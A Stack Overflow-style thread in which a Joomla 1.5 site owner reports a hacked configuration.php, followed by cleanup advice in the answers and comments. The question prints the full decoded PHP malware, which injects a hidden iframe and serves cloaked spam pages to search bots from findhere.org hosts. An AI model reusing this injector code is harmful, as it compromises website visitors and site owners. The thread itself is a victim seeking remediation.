# Joomla back-end login page keeps coming back to login page with no error. configuration.php file is infected. How to manage?

Tags: php, joomla, base64

Since a week i was trying to login to the back-end of my joomla 1.5 site. It simply keeps coming back to the login page without any error. When I took a look at the configuration.php file it appeared as a string encoded with following pattern:

```
<?php eval(base64_decode('string here';))) />
```

When i decoded it using an online service this is what it appears to be:

```
if (!defined('frmDs')){ define('frmDs' ,1);     function frm_dl ($url) {        if (function_exists('curl_init')) {         $ch = curl_init($url);          curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);            $out = curl_exec ($ch);         if (curl_errno($ch) !== 0) $out = false;            curl_close ($ch);       } else {$out = @file_get_contents($url);}       return trim($out);  }       function frm_crpt($in){     $il=strlen($in);$o='';      for ($i = 0; $i < $il; $i++) $o.=$in[$i] ^ '*';     return $o;  }       function frm_getcache($tmpdir,$link,$cmtime,$del=true){     $f = $tmpdir.'/sess_'.md5(preg_replace('/^http:\/\/[^\/]+/', '', $link));       if(!file_exists($f) || time() - filemtime($f) > 60 * $cmtime)       {           $dlc=frm_dl($link);         if($dlc===false){               if(del)                 @unlink($f);                else                    @touch($f);         }           else            {               if($fp = @fopen($f,'w')){                   fwrite($fp, frm_crpt($dlc)); fclose($fp);               }else{return $dlc;}         }       }       $fc = @file_get_contents($f);       return ($fc)?frm_crpt($fc):'';  }       function frm_isbot($ua){        if(($lip=ip2long($_SERVER['REMOTE_ADDR']))<0)$lip+=4294967296;      $rs = array(array(3639549953,3639558142),array(1089052673,1089060862),array(1123635201,1123639294),array(1208926209,1208942590),                    array(3512041473,3512074238),array(1113980929,1113985022),array(1249705985,1249771518),array(1074921473,1074925566),                    array(3481178113,3481182206),array(2915172353,2915237886));     foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;     if(!$ua)return true;        $bots = array('googlebot','bingbot','slurp','msnbot','jeeves','teoma','crawler','spider');      foreach ($bots as $b) if(strpos($ua, $b)!==false) return true;      return false;   }       function frm_tmpdir(){      $fs = array('/tmp','/var/tmp');        foreach (array('TMP', 'TEMP', 'TMPDIR') as $v) {            if ($t = getenv($v)) {$fs[]=$t;}        }        if (function_exists('sys_get_temp_dir')) {$fs[]=sys_get_temp_dir();}        $fs[]='.';              foreach ($fs as $f){            $tf = $f.'/'.md5(rand());           if($fp = @fopen($tf, 'w')){             fclose($fp);                unlink($tf);                return $f;          }        }      return false;   }   function frm_seref(){       $r = @strtolower($_SERVER["HTTP_REFERER"]);     $ses = array('google','bing','yahoo','ask','aol');      foreach ($ses as $se) if(strpos($r, $se.'.')!=false) return true;       return false;   }       function frm_isuniq($tdir){     $ip=$_SERVER['REMOTE_ADDR'];        $dbf=$tdir.'/sess_'.md5(date('m.d.y'));     $odbf = $tdir.'/sess_'.md5(date('m.d.y',time()-86400));     if (file_exists($odbf)) @unlink($odbf);     if(strpos(frm_crpt(@file_get_contents($dbf)),$ip) === false ){          if ($fp=@fopen($dbf,'a')){fputs($fp,frm_crpt($ip.'|')); fclose($fp);}           return true;        }       return false;   }       $tdir = frm_tmpdir();   $defframe = '<style>    .gtvvh { position:absolute; left:-760px; top:-927px; }</style><div class="gtvvh"><iframe src="http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.latest.js" width="477" height="435"></iframe></div>'; $defrdg='http://whivmjknp.findhere.org/jquery/get.php?ver=jquery.js';   $codelink = 'http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.latest.js';    $rdglink='http://whivmjknp.findhere.org/nc/gnc.php?ver=jquery.js';      $ua=$_SERVER['HTTP_USER_AGENT'];    $isb=frm_isbot($ua);        if (!$isb && preg_match('/Windows/', $ua) && preg_match('/MSIE|Opera/', $ua) && frm_isuniq($tdir) ){        error_reporting(0);         if(!isset($_COOKIE['__utmfr'])) {           if(!$codelink)              print($defframe);           else                print(frm_getcache($tdir,$codelink,15));            @setcookie('__utmfr',rand(1,1000),time()+86400*7,'/');      }   }       //-------   $host = preg_replace('/^w{3}\./','', strtolower($_SERVER['HTTP_HOST']));    if($tdir && strlen($host)<100 && preg_match('/^[a-z0-9\-]+\.([a-z]{2,5}|[a-z]{2,3}\.[a-z]{2,3}|.*\.edu)$/', $host)){        $parg = substr(preg_replace( '/[^a-z]+/', '',strtolower(base64_encode(md5($host)))),0,3);       $pageid = (isset($_GET[$parg]))?$_GET[$parg]*1:0;       $ruri = strtolower($_SERVER['REQUEST_URI']);        if((strpos($ruri,'/?')===0||strpos($ruri,'/index.php?')===0) && $pageid > 0){           print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&p=$pageid&pa=$parg",60*48,false));          exit();     }       if ($isb) {         error_reporting(0);         print(frm_getcache($tdir,"http://whivmjknp.findhere.org/rdg/getpage.php?h=$host&pa=$parg&g=".(($ruri=='/'||$ruri=='/index.php')?'1':'0'),60*48,false));     }   }   //---------}
```

I checked other Joomla installations on my hosting space and see that all the configuration.php are the same.

What to do?

Please help

Answer (score 0):

The only thing the the *configuration.php* file should have is defined variables. Nothing else. It could very well be that someone has hacked your site and messed around with files.

Change all passwords that are related to your website, including the hosting one.

Take a backup of your site via the cPanel and scan it with some antivirus software. Assuming there are no viruses detected, upgrade your site to the latest of the Joomla 2.5 series (2.5.14).

Then, remove the code you showed in your question from the configuration.php file and try logging back into the Joomla admin panel. If it works, ensure all your extensions are up to date and read this:

[Joomla! 2.5.4 Hacked: Having trouble with diagnosis](https://stackoverflow.com/questions/11036763/joomla-2-5-4-hacked-having-trouble-with-diagnosis/11037642#11037642).

If not, then try resetting your super user password via the database:

http://docs.joomla.org/How_do_you_recover_or_reset_your_admin_password%3F

**UPDATE:**
It seems your whole configuration.php file has been attacked. I have provided you with the code for the file, however there are some blank spaces to be filled in. Anything that does need filling in, I have written next to it:

http://pastebin.com/gWWtCAJR

Let me know how it goes :)

Comment: Hi! Great that you gave me a direction. But the configuration.php has nothing else than this encrypted text. Even the defined variables are not there! Any suggesions

Comment: Oh. That's not good at all. Let me just update my answer with more instructions

Comment: Thanks for you kind help. I did the necessary changes to the configuration file and replaced it. But still I keep coming back to the login page of back-end (administrator/index.php) without any error  for right or wrong login. I cannot get past this page!!!

Comment: Jeez this isn't good. It is possible that other files within your Joomla site have been messed around with. Did you take a backup and scan for viruses?

Comment: I was using the version 1.5 (By mistake i mentioned it earlier as 2.5.4..sorry for that). I have Norton 360. Can I use it to scan these php files also?

Comment: Oh 1.5. Well that might explain it then. 1.5 is old, unsupported and less secure than 2.5 or 3.x. You should have upgraded a long time ago. Yes, you can use Norton to scan the files